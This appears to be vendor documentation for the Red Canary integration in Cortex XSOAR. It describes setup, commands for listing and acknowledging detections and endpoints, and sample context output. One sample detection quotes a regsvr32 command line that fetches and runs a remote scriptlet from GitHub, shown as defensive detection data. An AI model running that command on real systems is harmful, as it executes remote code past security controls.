Red Canary

This Integration is part of the Red Canary Pack.#

Overview

Red Canary collects endpoint data using Carbon Black Response and CrowdStrike Falcon. The collected data is standardized into a common schema, which allows teams to detect, analyze and respond to security incidents.

Configure RedCanary on Cortex XSOAR

Navigate to Settings > Integrations > Servers & Services .
Search for RedCanary.
Click Add instance to create and configure a new integration instance.
- Name : a textual name for the integration instance.
- Domain (e.g., https://xsoar.my.redcanary.co)
- API Key
- Fetch incidents
- Incident type
- Use system proxy settings
- Trust any certificate (not secure)
Click Test to validate the URLs, token, and connection.

Fetched Incidents Data

Type: RedCanaryDetection
ID
Headline
Severity
Summary
Classification
Subclassification
Time
Acknowledged
RemediationStatus

Commands

You can execute these commands from the Cortex XSOAR CLI, as part of an automation, or in a playbook.
After you successfully execute a command, a DBot message appears in the War Room with the command details.

Acknowledge a detection: redcanary-acknowledge-detection
Update the remediation state of a detection: redcanary-update-remediation-state
Get a list of detections: redcanary-list-detections
Get a list of endpoints: redcanary-list-endpoints
Execute a playbook on a detection: redcanary-execute-playbook
Get an endpoint by endpoint ID: redcanary-get-endpoint
Get a list of detections: redcanary-get-endpoint-detections
Get a detection by the detection ID: redcanary-get-detection

1. Acknowledge a detection

Mark a detection as acknowledged to inform that it is being handled.

Base Command

redcanary-acknowledge-detection

Input

Argument Name	Description	Required
id	Detection ID. Can be obtained from the context.	Required

Context Output

There is no context output for this command.

Command Example

!redcanary-acknowledge-detection id=4

Human Readable Output

2. Update the remediation state of a detection

Updates the remediation state of a detection.

Base Command

redcanary-update-remediation-state

Input

Argument Name	Description	Required
id	Detection ID. Can be obtained from the context.	Required
remediation-state	How the detection was remediated.	Required
comment	Description of why and how the detection was remediated. This is ignored for remediated state.	Optional

Context Output

There is no context output for this command.

Command Example

!redcanary-update-remediation-state id=4 remediation-state=not_remediated_false_positive comment="updated by DBot"

Human Readable Output

3. Get a list of detections

Get a list of confirmed detections.

Base Command

redcanary-list-detections

Input

Argument Name	Description	Required
page	The page results to fetch. Default is first page.	Optional
per-page	Number of results to return per page	Optional

Context Output

Path	Type	Description
RedCanary.Detection.ID	number	Detection ID
RedCanary.Detection.Headline	string	Human-readable text about the detection
RedCanary.Detection.Severity	string	The severity level of the detection (High, medium, or Low)
RedCanary.Detection.Summary	string	A summary of information about the detection
RedCanary.Detection.Classification	string	Detection classification
RedCanary.Detection.Subclassification	string	Detection sub-classification
RedCanary.Detection.Time	date	The time the detection was confirmed as a threat by Red Canary
RedCanary.Detection.Acknowledged	boolean	Whether or not the detection is acknowledged
RedCanary.Detection.RemediationStatus	string	The state the detection is currently in
RedCanary.Detection.Reason	string	The reason for the detection
RedCanary.Detection.EndpointUserID	number	The ID of the user in the infected endpoint
RedCanary.Detection.EndpointID	number	The ID of the endpoint infected in the detection
Endpoint.Hostname	string	Fully-qualified endpoint hostname
Endpoint.ID	string	Endpoint ID
Endpoint.IPAddress	unknown	IP address of the endpoint
Endpoint.MACAddress	unknown	MAC address of the endpoint
Endpoint.OS	string	The operating system used by the endpoint
Endpoint.OSVersion	string	The complete operating system version identifier used by the endpoint
Endpoint.Memory	number	Physical memory of the endpoint in bytes
Endpoint.IsIsolated	boolean	Whether or not the endpoint is currently network isolated
Endpoint.IsDecommissioned	boolean	Whether or not the endpoint is decommissioned
Account.Username	string	Endpoint user name
Account.Hostname	string	Endpoint host name

Command Example

!redcanary-list-detections page=1 per-page=1

Context Example

{
    "Account": {
        "Username": "administrator",
        "Hostname": "xsoar-host"
    },
    "Endpoint": {
        "MACAddress": [
            "08:29:42:f0:b3:7c"
        ],
        "OS": "Windows",
        "Hostname": "xsoar-host",
        "IsDecommissioned": true,
        "IsIsolated": true,
        "OSVersion": "Windows Server 2016 Server Datacenter, 64-bit",
        "IPAddress": [
            "181.61.87.106"
        ],
        "ID": 2
    },
    "RedCanary": {
        "Detection": [
            {
                "Severity": "medium",
                "Classification": "Suspicious Activity",
                "Acknowledged": true,
                "Subclassification": [
                    "Process"
                ],
                "Summary": "The Windows Task Scheduler Configuration Tool was launched via command prompt and leveraged to create multiple suspicious scheduled tasks.",
                "Headline": "[DEM-6] Suspicious Activity (Process)",
                "Time": "2018-09-12T15:38:17Z",
                "Type": "RedCanaryDetection",
                "ID": 6
            },
        ]
    },
}

Human Readable Output

4. Get a list of endpoints

Returns a list of endpoints.

Base Command

redcanary-list-endpoints

Input

Argument Name	Description	Required
page	Page number in the query response. Default is 1.	Optional
per-page	Number of returned results per page. Default is 50	Optional

Context Output

Path	Type	Description
Endpoint.Hostname	string	Fully-qualified endpoint hostname
Endpoint.ID	string	Endpoint ID
Endpoint.IPAddress	unknown	IP address of the endpoint
Endpoint.MACAddress	unknown	MAC address of the endpoint
Endpoint.OS	string	The operating system used by the endpoint
Endpoint.OSVersion	string	The complete operating system version identifier used by the endpoint
Endpoint.Memory	number	Physical memory of the endpoint in bytes
Endpoint.IsIsolated	boolean	Whether or not the endpoint is currently network isolated
Endpoint.IsDecommissioned	boolean	Whether or not the endpoint is decommissioned

Command Example

!redcanary-list-endpoints

Context Example

{
    "EndPoint": [
        {
            "MACAddress": [
                "06:79:02:e0:b0:7c"
            ],
            "OS": "Windows",
            "Hostname": "ec2amaz-tmlcd45",
            "IsDecommissioned": true,
            "IsIsolated": true,
            "OSVersion": "Windows Server 2016 Server Datacenter, 64-bit",
            "IPAddress": [
                "172.31.37.106"
            ],
            "ID": 2
        },
}

Human Readable Output

5. Execute a playbook on a detection

Execute a predefined playbook on a detection.

Base Command

redcanary-execute-playbook

Input

Argument Name	Description	Required
playbook-id	Playbook ID of the playbook to execute	Optional
detection-id	Detection ID of the detection to execute the playbook on. Can be retrieved from the context.	Required
playbook-name	Playbook name of the playbook to execute. If the playbook ID is specified, this is argument is ignored.	Optional

Context Output

There is no context output for this command.

Command Example

!redcanary-execute-playbook detection-id=4 playbook-name=Isolate

Human Readable Output

6. Get an endpoint by the endpoint ID

Get an endpoint by the endpoint ID.

Base Command

redcanary-get-endpoint

Input

Argument Name	Description	Required
id	Endpoint ID	Required

Context Output

Path	Type	Description
Endpoint.Hostname	string	Fully-qualified endpoint hostname
Endpoint.ID	string	Endpoint ID
Endpoint.IPAddress	unknown	IP address of the endpoint
Endpoint.MACAddress	unknown	MAC address of the endpoint
Endpoint.OS	string	The operating system used by the endpoint
Endpoint.OSVersion	string	The complete operating system version identifier used by the endpoint
Endpoint.Memory	number	Physical memory of the endpoint in bytes
Endpoint.IsIsolated	boolean	Whether or not the endpoint is currently network isolated
Endpoint.IsDecommissioned	boolean	Whether or not the endpoint is decommissioned

Command Example

!redcanary-get-endpoint id=2

Context Example

{
    "EndPoint": [
        {
            "MACAddress": [
                "06:79:02:e0:b0:7c"
            ],
            "OS": "Windows",
            "Hostname": "ec2amaz-tmlcd45",
            "IsDecommissioned": true,
            "IsIsolated": true,
            "OSVersion": "Windows Server 2016 Server Datacenter, 64-bit",
            "IPAddress": [
                "172.31.37.106"
            ],
            "ID": 2
        },
}

Human Readable Output

7. Get a list of detections

Get a list of detections associated with the endpoint.

Base Command

redcanary-get-endpoint-detections

Input

Argument Name	Description	Required
id	Endpoint ID	Required

Context Output

Path	Type	Description
RedCanary.Detection.ID	number	Detection ID
RedCanary.Detection.Headline	string	Human-readable text about the detection
RedCanary.Detection.Severity	string	The severity of the detection (High, medium, or Low)
RedCanary.Detection.Summary	string	A summary of information about the detection
RedCanary.Detection.Classification	string	Detection classification
RedCanary.Detection.Subclassification	string	Detection subclassification
RedCanary.Detection.Time	date	The time the detection was confirmed as a threat by Red Canary
RedCanary.Detection.Acknowledged	boolean	Whether or not the detection is acknowledged
RedCanary.Detection.RemediationStatus	string	The state the detection is currently in
Endpoint.Hostname	string	Fully-qualified endpoint hostname
Endpoint.ID	string	Endpoint ID
Endpoint.IPAddress	unknown	IP address of the endpoint
Endpoint.MACAddress	unknown	MAC address of the endpoint
Endpoint.OS	string	The operating system used by the endpoint
Endpoint.OSVersion	string	The complete operating system version identifier used by the endpoint
Endpoint.Memory	number	Physical memory of the endpoint in bytes
Endpoint.IsIsolated	boolean	Whether or not the endpoint is currently network isolated
Endpoint.IsDecommissioned	boolean	Whether or not the endpoint is decommissioned
Account.Username	string	Endpoint user name
Account.Hostname	string	Endpoint host name

Command Example

!redcanary-get-endpoint-detections id=4

Context Example

{
    "Account": {
        "Username": "administrator",
        "Hostname": "xsoar-host"
    },
    "Endpoint": {
        "MACAddress": [
            "08:29:42:f0:b3:7c"
        ],
        "OS": "Windows",
        "Hostname": "xsoar-host",
        "IsDecommissioned": true,
        "IsIsolated": true,
        "OSVersion": "Windows Server 2016 Server Datacenter, 64-bit",
        "IPAddress": [
            "181.61.87.106"
        ],
        "ID": 2
    },
    "RedCanary": {
        "Detection": [
            {
                "Severity": "medium",
                "Classification": "Suspicious Activity",
                "Acknowledged": true,
                "Subclassification": [
                    "Process"
                ],
                "Summary": "The Windows Task Scheduler Configuration Tool was launched via command prompt and leveraged to create multiple suspicious scheduled tasks.",
                "Headline": "[DEM-6] Suspicious Activity (Process)",
                "Time": "2018-09-12T15:38:17Z",
                "Type": "RedCanaryDetection",
                "ID": 6
            },
        ]
    },
}

Human Readable Output

8. Get a detection by the detection ID

Returns a detection by the detection ID.

Base Command

redcanary-get-detection

Input

Argument Name	Description	Required
id	Detection ID	Required

Context Output

Path	Type	Description
RedCanary.Detection.ID	number	Detection ID
RedCanary.Detection.Headline	string	Human-readable text about the detection
RedCanary.Detection.Severity	string	The severity of the detection. High, medium, or low
RedCanary.Detection.Summary	string	A summary of information about the detection
RedCanary.Detection.Classification	string	Detection classification
RedCanary.Detection.Subclassification	string	Detection subclassification
RedCanary.Detection.Time	date	The time the detection was confirmed as a threat by Red Canary
RedCanary.Detection.Acknowledged	boolean	Whether or not the detection is acknowledged
RedCanary.Detection.RemediationStatus	string	The state the detection is currently in
RedCanary.Detection.Reason	string	The reason for the detection
RedCanary.Detection.EndpointUserID	number	The ID of the user in the infected endpoint
RedCanary.Detection.EndpointID	number	The ID of the endpoint infected in the detection
Endpoint.Hostname	string	Fully-qualified endpoint hostname
Endpoint.ID	string	Endpoint ID
Endpoint.IPAddress	unknown	IP address of the endpoint
Endpoint.MACAddress	unknown	MAC address of the endpoint
Endpoint.OS	string	The operating system used by the endpoint
Endpoint.OSVersion	string	The complete operating system version identifier used by the endpoint
Endpoint.Memory	number	Physical memory of the endpoint in bytes
Endpoint.IsIsolated	boolean	Whether or not the endpoint is currently network isolated
Endpoint.IsDecommissioned	boolean	Whether or not the endpoint is decommissioned
Account.Username	string	Endpoint user name
Account.Hostname	string	Endpoint host name
Domain.Name	string	Domain name
File.Name	string	File name
File.MD5	string	File MD5
File.SHA256	string	File SHA-256
File.Path	string	File path in the endpoint
File.Extension	string	File extension
IP.Address	string	IP Address
IP.Port	string	Port
Process.Name	string	Process name
Process.Path	string	Process binary path
Process.MD5	string	Binary MD5
Process.SHA256	string	Binary SHA-256
Process.StartTime	date	Process execution time
Process.CommandLine	string	Process command line

Command Example

!redcanary-get-detection id=4

Context Example

{
    "Account": {
        "Username": "administrator",
        "Hostname": "ec2amaz-tmlcd45"
    },
    "Endpoint": {
        "MACAddress": [
            "06:79:02:e0:b0:7c"
        ],
        "OS": "Windows",
        "Hostname": "ec2amaz-tmlcd45",
        "IsDecommissioned": false,
        "IsIsolated": true,
        "OSVersion": "Windows Server 2016 Server Datacenter, 64-bit",
        "IPAddress": [
            "172.31.37.106"
        ],
        "ID": 4
    },
    "Process": {
        "Path": "c:\\windows\\system32\\regsvr32.exe",
        "CommandLine": "regsvr32.exe  /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll",
        "Name": "c:\\windows\\system32\\regsvr32.exe",
        "StartTime": "2018-09-12T11:30:23Z",
        "MD5": "8cf9086be38a15e905924b4a45d814d9"
    },
    "IP": {
        "Port": 443,
        "Address": "151.101.12.133"
    },
    "Domain": {
        "Name": "raw.githubusercontent.com"
    },
    "RedCanary": {
        "Detection": {
            "Severity": "medium",
            "Classification": "Malicious Software",
            "Headline": "[DEM-4] Malicious Software",
            "Acknowledged": false,
            "Summary": "An instance of `Regsvr32` was leveraged to download Atomic Red Team code and execute it on this system.",
            "Time": "2018-09-12T11:15:55Z",
            "Type": "RedCanaryDetection",
            "ID": 4
        }
    },
    "File": [
        {
            "Path": "c:\\windows\\explorer.exe",
            "Name": "c:\\windows\\explorer.exe",
            "Extension": ".exe",
            "MD5": "a7190e945f2d00fe4af31289f4e64b8c"
        },
    ]
}